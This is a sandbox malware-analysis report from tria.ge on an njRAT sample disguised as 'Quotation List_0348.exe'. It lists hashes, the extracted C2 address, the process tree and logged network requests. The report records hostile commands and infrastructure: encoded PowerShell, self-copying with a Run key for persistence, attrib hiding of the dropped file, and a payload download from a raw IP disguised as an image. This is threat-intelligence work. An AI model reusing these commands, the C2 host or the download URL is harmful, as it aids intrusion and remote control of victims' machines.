Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    99s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    04/11/2022, 17:34 UTC

General

  • Target

    Quotation List_0348.exe

  • Size

    6KB

  • MD5

    53e70bf3a2964e9c086d8ea3ac0daddf

  • SHA1

    82c8534e7cf0cf7d899d5871d0da82ba9c875f3b

  • SHA256

    246e869353e3d90c8aef21611cdfa29f32eaf84c07382ceaa0b251818213c541

  • SHA512

    74c3f2d7f4ad771690dba6ee0e6964aeb77aaed77bfc5d4e3ad3dc0104076a2085383272697247ec3191cafae87af437333f024323160f0af6714bf0663ead6b

  • SSDEEP

    96:XVuqNek+1LnGPL5RT2SzLAEy/tnp347KVYzNt:wH1Lqh2SzLAEUNR4g6

Malware Config

Extracted

Family

njrat

Version

v2.0

Botnet

update

C2

money2022.ddns.net:8080

Mutex

Windows

Attributes
  • reg_key

    Windows

  • splitter

    |-F-|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Executes dropped EXE 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe
    "C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:988
    • C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe
      "C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"
      2⤵
        PID:1404
      • C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe
        "C:\Users\Admin\AppData\Local\Temp\Quotation List_0348.exe"
        2⤵
        • Drops startup file
        • Loads dropped DLL
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:976
        • C:\Users\Admin\AppData\Roaming\update.exe
          "C:\Users\Admin\AppData\Roaming\update.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1344
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA==
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1672
        • C:\Windows\SysWOW64\attrib.exe
          attrib +h +r +s "C:\Users\Admin\AppData\Roaming\update.exe"
          3⤵
          • Views/modifies file attributes
          PID:364

    Network

    • flag-nl
      GET
      http://194.180.48.203/Bgfjlzp.png
      Quotation List_0348.exe
      Remote address:
      194.180.48.203:80
      Request
      GET /Bgfjlzp.png HTTP/1.1
      Host: 194.180.48.203
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Fri, 04 Nov 2022 17:35:00 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
      Last-Modified: Thu, 03 Nov 2022 12:30:42 GMT
      ETag: "20ac00-5ec90202b35a1"
      Accept-Ranges: bytes
      Content-Length: 2141184
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: image/png
    • flag-nl
      GET
      http://194.180.48.203/Bgfjlzp.png
      update.exe
      Remote address:
      194.180.48.203:80
      Request
      GET /Bgfjlzp.png HTTP/1.1
      Host: 194.180.48.203
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Fri, 04 Nov 2022 17:36:25 GMT
      Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
      Last-Modified: Thu, 03 Nov 2022 12:30:42 GMT
      ETag: "20ac00-5ec90202b35a1"
      Accept-Ranges: bytes
      Content-Length: 2141184
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: image/png
    • 194.180.48.203:80
      http://194.180.48.203/Bgfjlzp.png
      http
      Quotation List_0348.exe
      37.4kB
      2.2MB
      809
      1579

      HTTP Request

      GET http://194.180.48.203/Bgfjlzp.png

      HTTP Response

      200
    • 194.180.48.203:80
      http://194.180.48.203/Bgfjlzp.png
      http
      update.exe
      36.7kB
      2.2MB
      796
      1577

      HTTP Request

      GET http://194.180.48.203/Bgfjlzp.png

      HTTP Response

      200
    No results found

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      33b6647aac585dac651de8a32f421d31

      SHA1

      0b7b6ebbcf2557b8b1aecdf286b6bcea26074f60

      SHA256

      85870715e640843a3249fde91c2054ddeb384fdc4a4fc9c6ec42826800188c73

      SHA512

      5a7d61e88a6587b73ae145bb49b252d01bc9f82858b97cff3e258d7701d94e843ac98542b24b8ea889b260eaf7695449bac86f9826f8265396b4cf60d4a4b232

    • C:\Users\Admin\AppData\Roaming\update.exe

      Filesize

      6KB

      MD5

      53e70bf3a2964e9c086d8ea3ac0daddf

      SHA1

      82c8534e7cf0cf7d899d5871d0da82ba9c875f3b

      SHA256

      246e869353e3d90c8aef21611cdfa29f32eaf84c07382ceaa0b251818213c541

      SHA512

      74c3f2d7f4ad771690dba6ee0e6964aeb77aaed77bfc5d4e3ad3dc0104076a2085383272697247ec3191cafae87af437333f024323160f0af6714bf0663ead6b

    • C:\Users\Admin\AppData\Roaming\update.exe

      Filesize

      6KB

      MD5

      53e70bf3a2964e9c086d8ea3ac0daddf

      SHA1

      82c8534e7cf0cf7d899d5871d0da82ba9c875f3b

      SHA256

      246e869353e3d90c8aef21611cdfa29f32eaf84c07382ceaa0b251818213c541

      SHA512

      74c3f2d7f4ad771690dba6ee0e6964aeb77aaed77bfc5d4e3ad3dc0104076a2085383272697247ec3191cafae87af437333f024323160f0af6714bf0663ead6b

    • \Users\Admin\AppData\Roaming\update.exe

      Filesize

      6KB

      MD5

      53e70bf3a2964e9c086d8ea3ac0daddf

      SHA1

      82c8534e7cf0cf7d899d5871d0da82ba9c875f3b

      SHA256

      246e869353e3d90c8aef21611cdfa29f32eaf84c07382ceaa0b251818213c541

      SHA512

      74c3f2d7f4ad771690dba6ee0e6964aeb77aaed77bfc5d4e3ad3dc0104076a2085383272697247ec3191cafae87af437333f024323160f0af6714bf0663ead6b

    • memory/976-70-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/976-72-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/976-62-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/976-63-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/976-66-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/976-65-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/976-67-0x0000000000400000-0x000000000040E000-memory.dmp

      Filesize

      56KB

    • memory/988-61-0x000000006EE00000-0x000000006F3AB000-memory.dmp

      Filesize

      5.7MB

    • memory/988-60-0x000000006EE00000-0x000000006F3AB000-memory.dmp

      Filesize

      5.7MB

    • memory/988-59-0x000000006EE00000-0x000000006F3AB000-memory.dmp

      Filesize

      5.7MB

    • memory/1344-79-0x0000000000310000-0x0000000000318000-memory.dmp

      Filesize

      32KB

    • memory/1672-84-0x000000006EDD0000-0x000000006F37B000-memory.dmp

      Filesize

      5.7MB

    • memory/1672-85-0x000000006EDD0000-0x000000006F37B000-memory.dmp

      Filesize

      5.7MB

    • memory/1672-86-0x000000006EDD0000-0x000000006F37B000-memory.dmp

      Filesize

      5.7MB

    • memory/1972-54-0x00000000002D0000-0x00000000002D8000-memory.dmp

      Filesize

      32KB

    • memory/1972-56-0x0000000006B00000-0x0000000006D12000-memory.dmp

      Filesize

      2.1MB

    • memory/1972-55-0x0000000075CF1000-0x0000000075CF3000-memory.dmp

      Filesize

      8KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.